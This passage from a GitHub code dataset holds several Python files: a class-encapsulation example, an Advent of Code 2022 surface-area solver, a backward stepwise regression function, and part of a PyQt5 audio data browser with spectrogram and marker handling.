q))","repo_name":"aishidajt9/fuzzySchelling","sub_path":"fuzzy_Schelling_utils/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74782682504","text":"# Encapsulation (or) Data Hiding :\r\n# It allows preventing the functions of a program to access directly the internal representation of a class type.\r\n# We use double underscore __ before the attributes names to make those attributes private.\r\n\r\nclass Myclass :\r\n __hiddenvariable = 2\r\n\r\n def add(self, increment):\r\n self.__hiddenvariable += increment\r\n print(self.__hiddenvariable)\r\n\r\nobject1 = Myclass()\r\nobject1.add(5)\r\n# print(object1.__hiddenvariable)\r\n\r\n","repo_name":"cuteboygowtham/python","sub_path":"data hiding or encapsulation.py","file_name":"data hiding or encapsulation.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18678471705","text":"from aocd.models import Puzzle\nfrom collections import defaultdict\nimport logging\nimport re\nimport sys\n\nlogging.basicConfig(level=logging.INFO)\n\n# Ugh.\nsys.setrecursionlimit(50000)\n\np = Puzzle(year=2022, day=18)\n\nPART_ONE = False\nTEST = False\n\nif TEST:\n lines = [\n \"2,2,2\",\n \"1,2,2\",\n \"3,2,2\",\n \"2,1,2\",\n \"2,3,2\",\n \"2,2,1\",\n \"2,2,3\",\n \"2,2,4\",\n \"2,2,6\",\n \"1,2,5\",\n \"3,2,5\",\n \"2,1,5\",\n \"2,3,5\",\n ]\nelse:\n lines = p.input_data.splitlines()\n\nclass Cube:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def __str__(self):\n return f\"{self.x},{self.y},{self.z}\"\n\ndef neighbours(c1, c2):\n if abs(c1.x - c2.x) == 1 and c1.y == c2.y and c1.z == c2.z:\n return True\n if c1.x == c2.x and abs(c1.y - c2.y) == 1 and c1.z == c2.z:\n return True\n if c1.x == c2.x and c1.y == c2.y and abs(c1.z - c2.z) == 1:\n return True\n\ndef count_inside_faces(c):\n insides = 0\n x, y, z = (c.x, c.y, c.z)\n for (nx, ny, nz) in [(x-1, y, z), (x+1, y, z),\n (x, y-1, z), (x, y+1, z),\n (x, y, z-1), (x, y, z+1)]:\n if (nx, ny, nz) not in 
cube_map:\n insides += 1\n return insides\n\ndef flood_fill(x, y, z):\n if (x, y, z) in cube_map:\n return\n logging.debug(f\"Flood filling {(x, y, z)}\")\n\n cube_map[(x, y, z)] = None\n\n if x - 1 >= min_x:\n flood_fill(x - 1, y, z)\n if x + 1 <= max_x:\n flood_fill(x + 1, y, z)\n\n if y - 1 >= min_y:\n flood_fill(x, y - 1, z)\n if y + 1 <= max_y:\n flood_fill(x, y + 1, z)\n\n if z - 1 >= min_z:\n flood_fill(x, y, z - 1)\n if z + 1 <= max_z:\n flood_fill(x, y, z + 1)\n\ncubes = []\ncube_map = {}\n\nfor line in lines:\n x, y, z = [int(n) for n in line.split(',')]\n cube = Cube(x, y, z)\n cubes.append(cube)\n cube_map[(x,y,z)] = cube\n\nmin_x, min_y, min_z = cubes[0].x, cubes[0].y, cubes[0].z\nmax_x, max_y, max_z = cubes[0].x, cubes[0].y, cubes[0].z\n\nfor cube in cubes[1:]:\n if cube.x < min_x:\n min_x = cube.x\n if cube.y < min_y:\n min_y = cube.y\n if cube.z < min_z:\n min_z = cube.z\n\n if cube.x > max_x:\n max_x = cube.x\n if cube.y > max_y:\n max_y = cube.y\n if cube.z > max_z:\n max_z = cube.z\n\nlogging.debug(f\"Extent: {(min_x, min_y, min_z)} to {(max_x, max_y, max_z)}\")\nmin_x -= 1\nmin_y -= 1\nmin_z -= 1\nmax_x += 1\nmax_y += 1\nmax_z += 1\nlogging.debug(f\"Grown Extent: {(min_x, min_y, min_z)} to {(max_x, max_y, max_z)}\")\n\nif not PART_ONE:\n flood_fill(min_x, min_y, min_z)\n\n# Shrink the extents back\nmin_x += 1\nmin_y += 1\nmin_z += 1\nmax_x -= 1\nmax_y -= 1\nmax_z -= 1\n\nsurface_area = 6 * len(cubes)\nlogging.info(f\"Found {len(cubes)} cubes. Max possible surface area is {surface_area}.\")\nfor a, cube in enumerate(cubes):\n cube_faces = 6\n for b, other_cube in enumerate(cubes):\n if a == b:\n continue\n if neighbours(cube, other_cube):\n surface_area -= 1\n cube_faces -= 1\n logging.debug(f\"Cube {a} {(cube.x,cube.y,cube.z)} neighbours {b} {(other_cube.x,other_cube.y,other_cube.z)}, now has {cube_faces} exposed.\")\n\n if not PART_ONE:\n # consider inside faces\n insides = count_inside_faces(cube)\n if insides > 0:\n logging.debug(f\"Cube {cube} had {insides} inside faces. 
Don't count those.\")\n surface_area -= insides\n\nlogging.info(f\"Surface area: {surface_area}.\")\n\nif not TEST:\n if PART_ONE:\n p.answer_a = surface_area\n else:\n p.answer_b = surface_area\n","repo_name":"mreid-moz/advent_of_code","sub_path":"2022/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26472173819","text":"import numpy as np\r\nimport pandas as pd\r\nimport statsmodels.api as sm\r\n\r\n\r\ndef backward_regression(X, y,\r\n threshold_out,\r\n verbose=False):\r\n print('Backward Selection')\r\n included=list(X.columns)\r\n while True:\r\n changed=False\r\n model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included]))).fit()\r\n # use all coefs except intercept\r\n pvalues = model.pvalues.iloc[1:]\r\n worst_pval = pvalues.max() # null if pvalues is empty\r\n if worst_pval > threshold_out:\r\n changed=True\r\n worst_feature = pvalues.idxmax()\r\n included.remove(worst_feature)\r\n if verbose:\r\n print('Drop {:30} with p-value {:.6}'.format(worst_feature, worst_pval))\r\n if not changed:\r\n break\r\n return included","repo_name":"chaoannricardo/2020_DataAnalytics","sub_path":"backward_regression.py","file_name":"backward_regression.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19352645061","text":"import os\nimport xml.dom.minidom\nfrom math import fabs, ceil, floor, log, log10\nimport numpy as np\ntry:\n from PyQt5.QtCore import Signal\nexcept ImportError:\n from PyQt5.QtCore import pyqtSignal as Signal\nfrom PyQt5.QtCore import Qt, QTimer\nfrom PyQt5.QtGui import QCursor, QKeySequence\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QScrollArea\nfrom PyQt5.QtWidgets import QAction, QMenu, QToolBar, QComboBox\nfrom PyQt5.QtWidgets import QLabel, QSizePolicy, QTableView\nfrom PyQt5.QtWidgets import QDialog, QDialogButtonBox, QFileDialog\nfrom PyQt5.QtWidgets import QAbstractItemView, QGraphicsRectItem\nimport pyqtgraph as pg\ntry:\n from thunderfish.dataloader import DataLoader\nexcept ImportError:\n from audioio import AudioLoader as DataLoader\nfrom audioio import available_formats, write_audio\nfrom audioio import fade\nfrom .version import __version__, __year__\nfrom .fulltraceplot import FullTracePlot, secs_to_str\nfrom .oscillogramplot import OscillogramPlot\nfrom .spectrumplot import SpectrumPlot\nfrom .traceitem import TraceItem\nfrom .specitem import SpecItem\nfrom .markerdata import colors, MarkerLabel, MarkerLabelsModel\nfrom .markerdata import MarkerData, MarkerDataModel\n\n\npg.setConfigOption('useNumba', True)\n\n\nclass DataBrowser(QWidget):\n\n zoom_region = 0\n play_region = 1\n save_region = 2\n ask_region = 3\n \n sigTimesChanged = Signal(object, object)\n sigAmplitudesChanged = Signal(object, object)\n sigFrequenciesChanged = Signal(object, object)\n sigResolutionChanged = Signal()\n sigFilterChanged = Signal()\n sigPowerChanged = Signal()\n\n \n def __init__(self, file_path, channels, show_channels, audio,\n acts, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # actions of main window:\n self.acts = acts\n\n # data:\n self.file_path = file_path\n self.channels = channels\n self.data = None\n self.rate = None\n self.tmax = 0.0\n self.meta_data = {}\n\n self.show_channels = show_channels\n self.current_channel = 0\n self.selected_channels = []\n \n self.trace_fracs = {0: 1, 1: 1, 2: 0.5, 3: 0.25, 4: 
0.15}\n\n self.region_mode = DataBrowser.ask_region\n \n # view:\n self.toffset = 0.0\n self.twindow = 2.0\n\n self.setting = False\n \n self.grids = 0\n self.show_traces = True\n self.show_specs = 2\n self.show_cbars = True\n self.show_fulldata = True\n \n # auto scroll:\n self.scroll_step = 0.0\n self.scroll_timer = QTimer(self)\n self.scroll_timer.timeout.connect(self.scroll_further)\n\n # audio:\n self.audio = audio\n self.audio_timer = QTimer(self)\n self.audio_timer.timeout.connect(self.mark_audio)\n self.audio_time = 0.0\n self.audio_tmax = 0.0\n self.audio_markers = [] # vertical lines showing position while playing\n\n # window:\n self.vbox = QVBoxLayout(self)\n self.vbox.setContentsMargins(0, 0, 0, 0)\n self.vbox.setSpacing(0)\n self.setEnabled(False)\n self.toolbar = None\n self.nfftw = None\n\n # cross hair:\n self.xpos_action = None\n self.ypos_action = None\n self.zpos_action = None\n self.cross_hair = False\n self.marker_ax = None\n self.marker_time = 0\n self.marker_ampl = 0\n self.marker_freq = 0\n self.marker_power = 0\n self.marker_channel = None\n self.prev_time = 0\n self.prev_ampl = 0\n self.prev_freq = 0\n self.prev_power = 0\n self.prev_channel = None\n self.delta_time = None\n self.delta_ampl = None\n self.delta_freq = None\n self.delta_power = None\n self.marker_data = MarkerData()\n self.marker_model = MarkerDataModel(self.marker_data)\n self.marker_labels = []\n self.marker_labels.append(MarkerLabel('start', 's', 'magenta'))\n self.marker_labels.append(MarkerLabel('peak', 'p', 'yellow'))\n self.marker_labels.append(MarkerLabel('end', 'e', 'blue'))\n self.marker_labels_model = MarkerLabelsModel(self.marker_labels,\n self.acts)\n self.marker_orig_acts = []\n \n # plots:\n self.figs = [] # all GraphicsLayoutWidgets - one for each channel\n self.borders = []\n self.sig_proxies = []\n # nested lists (channel, panel):\n self.axs = [] # all plots\n self.axts = [] # plots with time axis\n self.axys = [] # plots with amplitude axis\n self.axfxs = [] # plots with x-frequency axis\n self.axfys = [] # plots with y-frequency axis\n self.axgs = [] # plots with grids\n # lists with one plot per channel:\n self.axtraces = [] # trace plots\n self.axspacers = [] # spacer between trace and spectrogram\n self.axspecs = [] # spectrogram plots\n self.traces = [] # traces\n self.specs = [] # spectrograms\n self.cbars = [] # color bars\n self.trace_labels = [] # labels on traces\n self.spec_labels = [] # labels on spectrograms\n\n\n def __del__(self):\n if not self.data is None:\n self.data.close()\n\n \n def open(self):\n if not self.data is None:\n self.data.close()\n try:\n self.data = DataLoader(self.file_path, 60.0, 10.0)\n except IOError:\n self.data = None\n return\n self.file_path = self.data.filepath\n self.rate = self.data.samplerate\n self.marker_data.file_path = self.file_path\n\n self.toffset = 0.0\n self.twindow = 10.0\n self.tmax = len(self.data)/self.rate\n if self.twindow > self.tmax:\n self.twindow = np.round(2**(floor(log(self.tmax) / log(2.0)) + 1.0))\n\n if self.show_channels is None:\n if len(self.channels) == 0:\n self.show_channels = list(range(self.data.channels))\n else:\n self.show_channels = [c for c in self.channels if c < self.data.channels]\n else:\n self.show_channels = [c for c in self.show_channels if c < self.data.channels]\n if len(self.show_channels) == 0:\n self.show_channels = [0]\n \n self.current_channel = self.show_channels[0]\n self.selected_channels = list(self.show_channels)\n\n # load data:\n fmt_md = dict(filepath=self.file_path,\n 
samplingrate=f'{self.rate:.1f}Hz',\n channels=self.data.channels,\n frames=self.data.frames,\n duration=f'{self.data.frames/self.rate:.3f}s')\n md, cues = self.data.metadata(store_empty=False, first_only=False)\n self.meta_data = dict(format=fmt_md)\n self.meta_data.update(md)\n for c in cues:\n self.marker_data.add_data(0, float(c['pos'])/self.rate, label=c.get('label', ''))\n labels = [c['label'] for c in cues if 'label' in c]\n for i, l in enumerate(labels):\n self.marker_labels.append(MarkerLabel(l, '', list(colors.keys())[i % len(colors.keys())]))\n self.data[0,:]\n\n self.figs = [] # all GraphicsLayoutWidgets - one for each channel\n self.borders = []\n self.sig_proxies = []\n # nested lists (channel, panel):\n self.axs = [] # all plots\n self.axts = [] # plots with time axis\n self.axys = [] # plots with amplitude axis\n self.axfxs = [] # plots with x-frequency axis\n self.axfys = [] # plots with y-frequency axis\n self.axgs = [] # plots with grids\n # lists with one plot per channel:\n self.axtraces = [] # trace plots\n self.axspacers = [] # spacer between trace and spectrogram\n self.axspecs = [] # spectrogram plots\n self.traces = [] # traces\n self.trace_labels = [] # labels on traces\n self.specs = [] # spectrograms\n self.spec_labels = [] # labels on spectrograms\n self.cbars = [] # color bars\n self.audio_markers = [] # vertical line showing position while playing\n # font size:\n xwidth = self.fontMetrics().averageCharWidth()\n xwidth2 = xwidth/2\n for c in range(self.data.channels):\n self.axs.append([])\n self.axts.append([])\n self.axys.append([])\n self.axfxs.append([])\n self.axfys.append([])\n self.axgs.append([])\n self.audio_markers.append([])\n \n # one figure per channel:\n fig = pg.GraphicsLayoutWidget()\n fig.setBackground(None)\n fig.ci.layout.setContentsMargins(xwidth2, xwidth2, xwidth2, xwidth2)\n fig.ci.layout.setVerticalSpacing(0)\n fig.ci.layout.setHorizontalSpacing(xwidth)\n fig.setVisible(c in self.show_channels)\n self.vbox.addWidget(fig)\n self.figs.append(fig)\n \n # border:\n border = QGraphicsRectItem()\n border.setZValue(-1000)\n border.setPen(pg.mkPen('#aaaaaa', width=xwidth+1))\n fig.scene().addItem(border)\n fig.sigDeviceRangeChanged.connect(self.update_borders)\n self.borders.append(border)\n \n # spectrogram:\n spec = SpecItem(self.data, self.rate, c, 256, 0.5)\n self.specs.append(spec)\n axs = SpectrumPlot(c, xwidth, spec.fmax)\n axs.addItem(spec)\n labels = []\n for l in self.marker_labels:\n label = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None),\n brush=pg.mkBrush(l.color))\n axs.addItem(label)\n labels.append(label)\n self.spec_labels.append(labels)\n axs.setLimits(xMax=self.tmax,\n minXRange=10/self.rate, maxXRange=self.tmax)\n axs.setXRange(self.toffset, self.toffset + self.twindow)\n axs.sigXRangeChanged.connect(self.update_times)\n axs.setYRange(self.specs[c].f0, self.specs[c].f1)\n axs.sigYRangeChanged.connect(self.update_frequencies)\n axs.sigSelectedRegion.connect(self.region_menu)\n axs.sigUpdateFilter.connect(self.update_filter)\n axs.getViewBox().init_zoom_history()\n self.audio_markers[-1].append(axs.vmarker)\n fig.addItem(axs, row=0, col=0)\n \n # color bar:\n cbar = pg.ColorBarItem(colorMap='CET-R4', interactive=True,\n rounding=1, limits=(-200, 20))\n cbar.setLabel('right', 'Power (dB)')\n cbar.getAxis('right').setTextPen('black')\n cbar.getAxis('right').setWidth(6*xwidth)\n cbar.setLevels([spec.zmin, spec.zmax])\n cbar.setImageItem(spec)\n cbar.sigLevelsChanged.connect(self.update_power)\n cbar.setVisible(self.show_cbars)\n 
self.cbars.append(cbar)\n fig.addItem(cbar, row=0, col=1)\n spec.setCBar(cbar)\n self.axts[-1].append(axs)\n self.axfys[-1].append(axs)\n self.axgs[-1].append(axs)\n self.axs[-1].append(axs)\n self.axspecs.append(axs)\n \n # spacer:\n axsp = fig.addLayout(row=1, col=0)\n axsp.setContentsMargins(0, 0, 0, 0)\n self.axspacers.append(axsp)\n \n # trace plot:\n trace = TraceItem(self.data, self.rate, c)\n self.traces.append(trace)\n axt = OscillogramPlot(c, xwidth)\n axt.addItem(trace)\n labels = []\n for l in self.marker_labels:\n label = pg.ScatterPlotItem(size=10, hoverSize=20,\n hoverable=True,\n pen=pg.mkPen(None),\n brush=pg.mkBrush(l.color))\n axt.addItem(label)\n labels.append(label)\n self.trace_labels.append(labels)\n axt.getAxis('bottom').showLabel(c == self.show_channels[-1])\n axt.getAxis('bottom').setStyle(showValues=(c == self.show_channels[-1]))\n axt.setLimits(xMin=0, xMax=self.tmax,\n minXRange=10/self.rate, maxXRange=self.tmax)\n if np.isfinite(self.data.ampl_min) and np.isfinite(self.data.ampl_max):\n axt.setLimits(yMin=self.data.ampl_min, yMax=self.data.ampl_max,\n minYRange=1/2**16,\n maxYRange=self.data.ampl_max - self.data.ampl_min)\n\n axt.setXRange(self.toffset, self.toffset + self.twindow)\n axt.sigXRangeChanged.connect(self.update_times)\n axt.setYRange(self.traces[c].ymin, self.traces[c].ymax)\n axt.sigYRangeChanged.connect(self.update_amplitudes)\n axt.sigSelectedRegion.connect(self.region_menu)\n axt.getViewBox().init_zoom_history()\n self.audio_markers[-1].append(axt.vmarker)\n fig.addItem(axt, row=2, col=0)\n self.axts[-1].append(axt)\n self.axys[-1].append(axt)\n self.axgs[-1].append(axt)\n self.axs[-1].append(axt)\n self.axtraces.append(axt)\n\n proxy = pg.SignalProxy(fig.scene().sigMouseMoved, rateLimit=60,\n slot=lambda x, c=c: self.mouse_moved(x, c))\n self.sig_proxies.append(proxy)\n proxy = pg.SignalProxy(fig.scene().sigMouseClicked, rateLimit=60,\n slot=lambda x, c=c: self.mouse_clicked(x, c))\n self.sig_proxies.append(proxy)\n \n self.set_times()\n \n # tool bar:\n self.toolbar = QToolBar()\n self.toolbar.addAction(self.acts.skip_backward)\n self.toolbar.addAction(self.acts.seek_backward)\n self.toolbar.addAction(self.acts.seek_forward)\n self.toolbar.addAction(self.acts.skip_forward)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.acts.play_window)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.acts.zoom_home)\n self.toolbar.addAction(self.acts.zoom_back)\n self.toolbar.addAction(self.acts.zoom_forward)\n self.toolbar.addSeparator()\n self.nfftw = QComboBox(self)\n self.nfftw.setToolTip('NFFT (R, Shift+R)')\n self.nfftw.addItems([f'{2**i}' for i in range(4, 16)])\n self.nfftw.setEditable(False)\n self.nfftw.setCurrentText(f'{self.specs[self.current_channel].nfft}')\n self.nfftw.currentTextChanged.connect(lambda s: self.set_resolution(nfft=int(s)))\n self.toolbar.addWidget(self.nfftw)\n self.toolbar.addSeparator()\n self.toolbar.addWidget(QLabel('Channel:'))\n for act in self.acts.channels[:self.data.channels]:\n self.toolbar.addAction(act)\n spacer = QWidget()\n spacer.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)\n self.toolbar.addWidget(spacer)\n self.xpos_action = self.toolbar.addAction('xpos')\n self.xpos_action.setVisible(False)\n self.toolbar.widgetForAction(self.xpos_action).setFixedWidth(10*xwidth)\n self.ypos_action = self.toolbar.addAction('ypos')\n self.ypos_action.setVisible(False)\n self.toolbar.widgetForAction(self.ypos_action).setFixedWidth(10*xwidth)\n self.zpos_action = 
self.toolbar.addAction('zpos')\n self.zpos_action.setVisible(False)\n self.toolbar.widgetForAction(self.zpos_action).setFixedWidth(10*xwidth)\n self.vbox.addWidget(self.toolbar)\n \n # full data:\n self.datafig = FullTracePlot(self.data, self.rate, self.axtraces)\n self.vbox.addWidget(self.datafig)\n\n self.setEnabled(True)\n self.adjust_layout(self.width(), self.height())\n\n # add marker data to plot:\n labels = [l.label for l in self.marker_labels]\n for t, l in zip(self.marker_data.times, self.marker_data.labels):\n lidx = labels.index(l)\n for c, tl in enumerate(self.trace_labels):\n tidx = int(t*self.rate)\n tl[lidx].addPoints((t,), (self.data[tidx, c],), data=(l,))\n for c, sl in enumerate(self.spec_labels):\n sl[lidx].addPoints((t,), (0.0,), data=(l,))\n\n\n def show_metadata(self):\n \n def format_section(md, level):\n mdtable = ''\n if isinstance(md, dict):\n for k in md:\n if isinstance(md[k], dict):\n # new section:\n pads = ''\n if level > 0:\n pads = f' style=\"padding-left: {level*30:d}px;\"'\n mdtable += f'{k}:'\n mdtable += format_section(md[k], level+1)\n else:\n # key-value pair:\n pads = ''\n if level > 0:\n pads = f' style=\"padding-left: {level*30:d}px;\"'\n value = md[k]\n if isinstance(value, (list, tuple)):\n value = ', '.join(value)\n mdtable += f'{k}{value}'\n else:\n if hasattr(md, '__getitem__') and len(md) > 0 and md[0] == '<':\n dom = xml.dom.minidom.parseString(md)\n md = dom.toprettyxml(indent=' ')\n md = f'
{md.replace(\"<\", \"<\").replace(\">\", \">\")}
'\n mdtable += f'{md}'\n return mdtable\n\n w = xwidth = self.fontMetrics().averageCharWidth()\n level = 0\n mdtable = f''\n for i, sk in enumerate(self.meta_data):\n md = self.meta_data[sk]\n if i > 0:\n mdtable += ''\n mdtable += f''\n mdtable += format_section(md, level)\n mdtable += '
{sk}:
'\n dialog = QDialog(self)\n dialog.setWindowTitle('Meta data')\n vbox = QVBoxLayout()\n dialog.setLayout(vbox)\n label = QLabel(mdtable)\n label.setTextInteractionFlags(Qt.TextSelectableByMouse);\n scrollarea = QScrollArea()\n scrollarea.setWidget(label)\n vbox.addWidget(scrollarea)\n buttons = QDialogButtonBox(QDialogButtonBox.Close)\n buttons.rejected.connect(dialog.reject)\n vbox.addWidget(buttons)\n dialog.show()\n\n\n def set_cross_hair(self, checked):\n self.cross_hair = checked\n if self.cross_hair:\n # disable existing key shortcuts:\n self.marker_orig_acts = []\n for l in self.marker_labels:\n ks = QKeySequence(l.key_shortcut)\n for a in dir(self.acts):\n act = getattr(self.acts, a)\n if isinstance(act, QAction) and act.shortcut() == ks:\n self.marker_orig_acts.append((act.shortcut(), act))\n act.setShortcut(QKeySequence())\n break\n # setup marker actions: \n for l in self.marker_labels:\n if l.action is None:\n l.action = QAction(l.label, self)\n l.action.triggered.connect(lambda x, label=l.label: self.store_marker(label))\n self.addAction(l.action)\n l.action.setShortcut(l.key_shortcut)\n l.action.setEnabled(True)\n else:\n self.xpos_action.setVisible(False)\n self.ypos_action.setVisible(False)\n self.zpos_action.setVisible(False)\n for axts in self.axts:\n for ax in axts:\n ax.xline.setPos(-1)\n for axys in self.axys:\n for ax in axys:\n ax.yline.setPos(-1000)\n for axfys in self.axfys:\n for ax in axfys:\n ax.yline.setPos(-1)\n self.clear_marker()\n # disable marker actions:\n for l in self.marker_labels:\n l.action.setEnabled(False)\n # restore key shortcuts:\n for key, act in self.marker_orig_acts:\n act.setShortcuts(key)\n self.marker_orig_acts = []\n\n\n def clear_marker(self):\n for axs in self.axs:\n for axp in axs:\n if hasattr(axp, 'prev_marker'):\n axp.prev_marker.clear()\n self.prev_channel = None\n\n\n def set_marker(self):\n self.clear_marker()\n if not self.marker_ax is None and not self.marker_time is None:\n if not self.marker_ampl is None:\n self.marker_ax.prev_marker.setData((self.marker_time,),\n (self.marker_ampl,))\n if not self.marker_freq is None:\n self.marker_ax.prev_marker.setData((self.marker_time,),\n (self.marker_freq,))\n # remember:\n self.prev_time = self.marker_time\n self.prev_ampl = self.marker_ampl\n self.prev_freq = self.marker_freq\n self.prev_power = self.marker_power\n self.prev_channel = self.marker_channel\n\n \n def store_marker(self, label=''):\n self.marker_model.add_data(self.marker_channel,\n self.marker_time, self.marker_ampl,\n self.marker_freq,\n self.marker_power,self.delta_time,\n self.delta_ampl, self.delta_freq,\n self.delta_power, label)\n # add new label point to scatter plots:\n labels = [l.label for l in self.marker_labels]\n if len(label) > 0 and label in labels and \\\n not self.marker_time is None:\n lidx = labels.index(label)\n for c, tl in enumerate(self.trace_labels):\n if c == self.marker_channel and not self.marker_ampl is None:\n tl[lidx].addPoints((self.marker_time,),\n (self.marker_ampl,))\n else:\n tidx = int(self.marker_time*self.rate)\n tl[lidx].addPoints((self.marker_time,),\n (self.data[tidx, c],))\n for c, sl in enumerate(self.spec_labels):\n y = 0.0 if self.marker_freq is None else self.marker_freq\n sl[lidx].addPoints((self.marker_time,), (y,))\n \n \n def mouse_moved(self, evt, channel):\n if not self.cross_hair:\n return\n \n # find axes and position:\n pixel_pos = evt[0]\n self.marker_ax = None\n self.marker_time = None\n self.marker_ampl = None\n self.marker_freq = None\n self.marker_power = 
None\n self.marker_channel = channel\n for ax in self.axs[channel]:\n if ax.sceneBoundingRect().contains(pixel_pos):\n pos = ax.getViewBox().mapSceneToView(pixel_pos)\n pixel_pos.setX(pixel_pos.x()+1)\n npos = ax.getViewBox().mapSceneToView(pixel_pos)\n if hasattr(ax, 'xline'):\n ax.xline.setPos(pos.x())\n # is it time?\n for axts in self.axts:\n if ax in axts:\n self.marker_ax = ax\n self.marker_time = pos.x()\n break\n if hasattr(ax, 'yline'):\n ax.yline.setPos(pos.y())\n # is it amplitude?\n for axys in self.axys:\n if ax in axys:\n self.marker_ampl = pos.y()\n break\n # is it trace amplitude?\n if ax in self.axtraces:\n if not self.marker_time is None:\n trace = self.traces[self.axtraces.index(ax)]\n self.marker_time, self.marker_ampl = \\\n trace.get_amplitude(self.marker_time,\n pos.y(), npos.x())\n # is it frequency?\n for axfys in self.axfys:\n if ax in axfys:\n self.marker_freq = pos.y()\n break\n # is it spectrogram?\n if self.marker_time is not None and \\\n self.marker_freq is not None and ax in self.axspecs:\n spec = self.specs[self.axspecs.index(ax)]\n fi = int(floor(self.marker_freq/spec.fresolution))\n ti = int(floor((self.marker_time - spec.offset/spec.rate) / spec.tresolution))\n self.marker_power = spec.spectrum[fi, ti]\n break\n \n # set cross-hair positions:\n for axts in self.axts:\n for axt in axts:\n axt.xline.setPos(-1 if self.marker_time is None else self.marker_time)\n for axys in self.axys:\n for axy in axys:\n axy.yline.setPos(-1000 if self.marker_ampl is None else self.marker_ampl)\n for axfys in self.axfys:\n for axf in axfys:\n axf.yline.setPos(-1 if self.marker_freq is None else self.marker_freq)\n \n # compute deltas:\n self.delta_time = None\n self.delta_ampl = None\n self.delta_freq = None\n self.delta_power = None\n if self.marker_time is not None and \\\n self.prev_channel is not None and self.prev_time is not None:\n self.delta_time = self.marker_time - self.prev_time\n if self.marker_ampl is not None and \\\n self.prev_channel is not None and self.prev_ampl is not None:\n self.delta_ampl = self.marker_ampl - self.prev_ampl\n if self.marker_freq is not None and \\\n self.prev_channel is not None and self.prev_freq is not None:\n self.delta_freq = self.marker_freq - self.prev_freq\n if self.marker_power is not None and \\\n self.prev_channel is not None and self.prev_power is not None:\n self.delta_power = self.marker_power - self.prev_power\n \n # report time on toolbar:\n if self.delta_time is not None:\n sign = '-' if self.delta_time < 0 else ''\n s = f'\\u0394t={sign}{secs_to_str(fabs(self.delta_time))}'\n self.xpos_action.setText(s)\n elif self.marker_time is not None:\n sign = '-' if self.marker_time < 0 else ''\n s = f't={sign}{secs_to_str(fabs(self.marker_time))}'\n self.xpos_action.setText(s)\n else:\n self.xpos_action.setText('')\n # report amplitude or frequency on toolbar:\n if self.delta_ampl is not None:\n s = f'\\u0394a={self.delta_ampl:6.3f}'\n self.ypos_action.setText(s)\n elif self.marker_ampl is not None:\n s = f'a={self.marker_ampl:6.3f}'\n self.ypos_action.setText(s)\n elif self.delta_freq is not None:\n s = f'\\u0394f={self.delta_freq:4.0f}Hz'\n self.ypos_action.setText(s)\n elif self.marker_freq is not None:\n s = f'f={self.marker_freq:4.0f}Hz'\n self.ypos_action.setText(s)\n else:\n self.ypos_action.setText('')\n # report power on toolbar:\n if self.delta_power is not None:\n s = f'\\u0394p={self.delta_power:6.1f}dB'\n self.zpos_action.setText(s)\n elif self.marker_power is not None:\n s = f'p={self.marker_power:6.1f}dB'\n 
self.zpos_action.setText(s)\n else:\n self.zpos_action.setText('')\n self.xpos_action.setVisible(self.marker_time is not None)\n self.ypos_action.setVisible(self.marker_ampl is not None or\n self.marker_freq is not None)\n self.zpos_action.setVisible(self.marker_power is not None)\n\n\n def mouse_clicked(self, evt, channel):\n if not self.cross_hair:\n return\n \n # update position:\n self.mouse_moved((evt[0].scenePos(),), channel)\n\n # store marker positions:\n if (evt[0].button() & Qt.LeftButton) > 0 and \\\n (evt[0].modifiers() == Qt.NoModifier or \\\n (evt[0].modifiers() & Qt.ShiftModifier) == Qt.ShiftModifier):\n menu = QMenu(self)\n acts = [menu.addAction(self.marker_labels_model.icons[l.color], l.label) for l in self.marker_labels]\n act = menu.exec(QCursor.pos())\n if act in acts:\n idx = acts.index(act)\n self.store_marker(self.marker_labels[idx].label)\n\n # clear marker:\n if (evt[0].button() & Qt.RightButton) > 0:\n self.clear_marker()\n \n # set marker and remember position:\n if (evt[0].button() & Qt.LeftButton) > 0 and \\\n (evt[0].modifiers() & Qt.ControlModifier) == Qt.ControlModifier:\n self.set_marker()\n\n \n def label_editor(self):\n self.marker_labels_model.set(self.marker_labels)\n self.marker_labels_model.edit(self)\n \n \n def marker_table(self):\n dialog = QDialog(self)\n dialog.setWindowTitle('Audian marker table')\n vbox = QVBoxLayout()\n dialog.setLayout(vbox)\n view = QTableView()\n view.setModel(self.marker_model)\n view.resizeColumnsToContents()\n width = view.verticalHeader().width() + 24\n for c in range(self.marker_model.columnCount()):\n width += view.columnWidth(c)\n dialog.setMaximumWidth(width)\n dialog.resize(width, 2*width//3)\n view.setSelectionMode(QAbstractItemView.ContiguousSelection)\n vbox.addWidget(view)\n buttons = QDialogButtonBox(QDialogButtonBox.Close |\n QDialogButtonBox.Save |\n QDialogButtonBox.Reset)\n buttons.rejected.connect(dialog.reject)\n buttons.button(QDialogButtonBox.Reset).clicked.connect(self.marker_model.clear)\n buttons.button(QDialogButtonBox.Save).clicked.connect(lambda x: self.marker_model.save(self))\n vbox.addWidget(buttons)\n dialog.show()\n \n\n def update_borders(self, rect=None):\n for c in range(len(self.figs)):\n self.borders[c].setRect(0, 0, self.figs[c].size().width(),\n self.figs[c].size().height())\n self.borders[c].setVisible(c in self.selected_channels)\n\n\n def showEvent(self, event):\n if self.data is None:\n return\n self.setting = True\n for c in range(self.data.channels):\n # update time ranges:\n for ax in self.axts[c]:\n ax.setXRange(self.toffset, self.toffset + self.twindow)\n # update amplitude ranges:\n for ax in self.axys[c]:\n ax.setYRange(self.traces[c].ymin, self.traces[c].ymax)\n # update frequency ranges:\n for ax in self.axfys[c]:\n ax.setYRange(self.specs[c].f0, self.specs[c].f1)\n for ax in self.axfxs[c]:\n 